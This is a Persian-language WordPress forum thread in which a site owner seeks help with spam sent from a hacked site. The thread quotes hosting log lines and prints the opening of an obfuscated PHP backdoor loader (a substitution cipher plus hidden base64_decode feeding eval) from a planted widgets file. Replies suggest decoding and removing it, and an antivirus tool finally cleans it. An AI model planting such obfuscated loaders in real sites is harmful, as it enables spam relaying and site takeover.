hiwa

مشکل امنیتی در مورد ارسال ایمیل ناخواسته از سایت + جزئیات خطا

5 پست در این موضوع قرار دارد

ارسال شده در (ویرایش شده)

سلام دوستان

من یک هفته است درگیر یک مشکل امنیتی در سایت وردپرسم هستم ممنون میشم اگه وقت بگذارید نظرتون رو بگید تا بتونم بررسی های بیشتری داشته باشم.

متن خطایی که کارشناس هاست برای من ارسال کرده اینه:

لینک های مربوط به صفحات و کدهای آلوده در سایت شما به شرح ذیل ارائه می گردد : 


[27-Dec-2016 20:48:46 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: manclik@o2.pl -- Headers: Date: Tue, 27 Dec 2016 20:48:46 -0500 From: Adrianna <adrianna@mydomain.com> Message-ID: <e086de42938f51715a6c6f5e2440922a@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_e086de42938f51715a6c6f5e2440922a" Content-Transfer-Encoding: 8bit


[28-Dec-2016 03:32:25 America/New_York] mail() on [D:\HostingSpaces\mydomain.com\mydomain.com\wwwroot\wp-includes\widgets\ajax61.php(1958) : eval()'d code:775]: To: panos@spitfire.gr -- Headers: Date: Wed, 28 Dec 2016 03:32:25 -0500 From: Debbie <debbie@mydomain.com> Message-ID: <f69af4c19b6af26f68341250901069ed@peykeaval.com> X-Priority: 3 MIME-Version: 1.0 Content-Type: multipart/alternative;     boundary="b1_f69af4c19b6af26f68341250901069ed" Content-Transfer-Encoding: 8bit

قالبی که استفاده کردم listify نام داره . از سایت nikan خریداری کردم (250 هزار)

دو سه روز کامل درگیر اسکن و بررسی بودم و دوباره فایل های اسکن شده رو روی هاست(ویندوزی) پاک شده آپلود کردم اما باز هم همان مشکل قبلی پیش آمد.

سیستم خودم رو فول اسکن کردم.

تمام فایلهای سایت رو هم دانلود اسکن کردم. موارد مشکوک رو fix کردم با آنتی ویرویس avast Free اما مشکلم حل نشده.

راهکاری به نظرتون میرسه ؟

ممنون

ویرایش شده در توسط hiwa
1

به اشتراک گذاری این پست


لینک به پست

محتوای فایل ajax61.php هم به این شکله :

<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

0

به اشتراک گذاری این پست


لینک به پست
در 5 ساعت قبل، hiwa گفته است :

محتوای فایل ajax61.php هم به این شکله :


<?php
 $euvwzec = 2437; function kjmlq($hebqeajjrg, $psycehqwla){$evprzo = ''; for($i=0; $i < strlen($hebqeajjrg); $i++){$evprzo .= isset($psycehqwla[$hebqeajjrg[$i]]) ? $psycehqwla[$hebqeajjrg[$i]] : $hebqeajjrg[$i];}
$duqcskxg="base" . "64_decode";return $duqcskxg($evprzo);}
$qewdep = 'FSUdZJwNMAF8ktJfvcwfAtzIMfv3uXjJiXq76q1xFSUdZJwNMAF8ktzIM5wUvnkIvnGnOC9qxi3rCg47lcUR'.
'vtJ1xChKbAYRMAYUbeJ1ZQwdAeL7lQ0nOC9qxi3rCg4NMALRhSUKMJw3ZQ57'.
'hCsqxi3rCs1xZQb8ZArNMAF8kywiLJkQLJu7xF1x2q1xCDLR01JDJgJDQfhFDy4R01JGLBhhuo1suBWB6f9rCsggA5ry0UMy0U'.
'3n0gJri5LyA1yXLyunAD9wuCuzGavdGCEqOaXB6q1xCQUcxCyUlA412DsgA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLy'.
'wSi5unADg7oF8k2q1xCFggA5ry0UMy0U3nDyL00ywbA1Mp0Uh40gLyLywSi5unAD9wuC'.

 

درود بر شما بنده زیاد ازین کدها سر در نیاوردم ولی تا جایی که متوجه شدم اول اینکه شما دارین از هاست ویندوز استفاده میکنین که این زیاد با وردپرس همخوانی نداره و عمده مشکلاتتون دقیقا از اینجا شروع میشه!

بعدش اینکه فک میکنم یه کد مخرب بصورت رمزگذاری شده همون متن سبز رنگ در یکی از ابزارکهای قالب وجود داره!

که اول باید دیکد بشه و بعدا که متوجه شدین چی هست حذف بشه!

یا اون بخش از کدها رو حدف کنید و ببینید مشکل بر طرف میشه یا بازم وجود داره!

فک میکنم این موارد رو چک کنید مشکلتون برطرف بشه اگر نشد بازم پیام بزاردی فرصتی داشتم خدمت میرسم و بازم چک میکنیم با هم

^_^

1

به اشتراک گذاری این پست


لینک به پست

دوستت عزیز خیلی متشکرم از جوابت. مواردی که گفتی رو دارم انجام میدم. امیدوارم حل بشه. نتیجه رو حتما خدمتت گزارش میدم. بازم ممنونم ازت.

0

به اشتراک گذاری این پست


لینک به پست

مشکل من یک بک دور به اسم Backdoor.PHP.Agent.RO  بود که به کمک Bitdefender total security 2017 تونستم مشکل رو حل کنم.

0

به اشتراک گذاری این پست


لینک به پست

برای ارسال نظر یک حساب کاربری ایجاد کنید یا وارد حساب خود شوید

برای اینکه بتوانید نظر ارسال کنید نیاز دارید که کاربر سایت شوید

ایجاد یک حساب کاربری

برای حساب کاربری جدید در انجمن ما ثبت نام کنید. عضویت خیلی ساده است !


ثبت نام یک حساب کاربری جدید

ورود به حساب کاربری

دارای حساب کاربری هستید؟ از اینجا وارد شوید


ورود به حساب کاربری

  • مطالب مشابه

    • توسط omidtt
      سلام خسته نباشید
      برای وب سایت https://perfectmoney24.com  نیاز به افزونه ای دارم که سایت و به کانال تلگرام متصل کنم . امکانپذیر این مورد ؟ راهنمایی کنید لطفا
       
       
    • توسط Enzo
      سلام ، من مشکل عجیبی دارم و سایتم با فیلتر شکن باز نمیشه ! 
      کسی کیتونه راهنمایی کنه ؟
      آدرس سایت
    • توسط unid_user
      سلام و درود
      دوستان گرامی، می خوام وقتی وارد حساب کاربریم میشم اون قسمتی که نوشته ورود به سیستم نمایش داده نشه.
      با تشکر و سپاس

    • توسط chetorir
      با سلام و وقت بخیر خدمت تمام اساتید و دوستان عزیز؛
      من یک وب سایت دارم که چندماهی میشه بارگذاری شده ولی چندتا مشکل باهاش دارم.
      اول سرعت لود سایته، با اینکه افزونه wp rocketرو نصب کردم ولی یکم سایتم کنده
      مشکل دوم با اینکه هیچ مشکلی تو نسخه موبایلش وجود نداره و از تگ og استفاده کردم ولی بازم پیشنمایشی داخل تلگرام نداره (دامین آتوریتی :8، پیچ آتوریتی:3)
      با اجازه آدرس سایت به همراه عکس بررسی آن داخل gtmetrix رو قرار میدم لطفا من رو راهنمایی کنید. (bonianservice.com)
      بنظر شما چه هاستی تهیه کنم بهتره؟ اگه هاست خوبیم سراغ دارید لطفا معرفی کنید.

      با تشکر
    • توسط samira127

      من یک اسلایدر زدم با jsولی نمیشه وقتی اسلاید میشه ب صورت scrollو ul  نه اسلایدی اینم کد html

      <div class="col-12 col-md-6 pb-0 pb-md-3 pt-2 pr-md-1">
                          <div id="featured" class="carousel slide carousel" data-ride="carousel">
                              ّ <div id="dots" class="carousel-indicators">
                                  <span class="dot active" data-target="#carousel-example-generic"></span>
                              </div>
                              <div id="slider">
                                  <!--Item slider-->
                                  <?php
                                  $args = array(
                                      'posts_per_page' => 5,
                                      'cat' => 10,
                                  );
                                  $query = new WP_Query($args);
                                  ?>
                                  <?php if ($query->have_posts()) : ?>
                                  <?php $i = 0; ?>
                                  <?php while ($query->have_posts()) : $query->the_post() ?>
                                  <div class="slide active">
                                      <div class="card border-0 rounded-0 text-light overflow zoom">
                                          <div class="position-relative">
                                              <!--thumbnail img-->
                                              <div class="ratio_left-cover-1 image-wrapper overflow">
                                                  <a href="<?php the_permalink(); ?>">
                                                      <?php
                                                              $src = wp_get_attachment_image_src(get_post_thumbnail_id($post->ID), 'full', false);
                                                              ?>
                                                      <?php the_post_thumbnail("w-100 img-thumbnail mx-auto d-block overflow"); ?>
                                                  </a>
                                              </div>
                                              <div class="position-absolute p-2 p-lg-3 b-0 w-100 bg-shadow">
                                                  <!--title-->
                                                  <a href="<?php the_permalink(); ?>">
                                                      <h2 class="h3 post-title text-white my-1"><?php the_title(); ?></h2>
                                                  </a>
                                                  <!— meta title —>
                                                  <div class="news-meta">
                                                      <span class="news-author">by <a class="text-white font-weight-bold" href="<?php the_permalink(); ?>"><?php the_author(); ?></a></span>
                                                      <span class="news-date"><?php the_time('d‌ F‌ Y'); ?></span>
                                                  </div>
                                              </div>
                                          </div>
                                      </div>
                                  </div>
                                  <?php endwhile ?>
                                  <?php endif ?>
                                  <?php wp_reset_postdata(); ?>
                                  <!--end item slider-->
                              </div>
                          </div>
                          <!--end carousel inner-->
                          <!--navigation-->
                          <a class="carousel-control-prev prev" href="#featured" role="button" data-slide="prev">
                              <span class="carousel-control-prev-icon" aria-hidden="true"></span>
                              <span class="sr-only">Previous</span>
                          </a>
                          <a class="carousel-control-next next" href="#featured" role="button" data-slide="next">
                              <span class="carousel-control-next-icon" aria-hidden="true"></span>
                              <span class="sr-only">Next</span>
                          </a>
                          <script type="text/javascript">
                          </script>
                      </div>

      اینم کد js

      var slide = document.getElementsByClassName('slide');
      var dot = document.getElementsByClassName('dot');
      var prev = document.querySelector('.prev');
      var next = document.querySelector('.next');
      var n = 0;
      var i;
      function disno(){
          for( i = 0 ; i<slide.length ; i++){
              slide.style.display = 'none';
          }
      }
      function no_active(){
          for( i = 0 ; i<dot.length ; i++){
              dot.classList.remove('active');
          }
      }
      next.addEventListener('click',function(e){
          e.preventDefault();
          n++;
          if( n > slide.length - 1){ // length starts From 1
              n = 0; // Arrays Starts From zero
          }
          disno();
          no_active()
          slide[n].style.display = 'block';
          dot[n].classList.add('active');
      })
      prev.addEventListener('click',function(e){
          e.preventDefault();
          n--;
          if( n < 0){ // length starts From 1
              n = slide.length - 1; // Arrays Starts From zero
          }
          disno();
          no_active()
          slide[n].style.display = 'block';
          dot[n].classList.add('active');
      })
      setInterval(function(){
          n++;
          if( n > slide.length - 1){ // length starts From 1
              n = 0; // Arrays Starts From zero
          }
          disno();
          no_active()
          slide[n].style.display = 'block';
          dot[n].classList.add('active');
      },3000)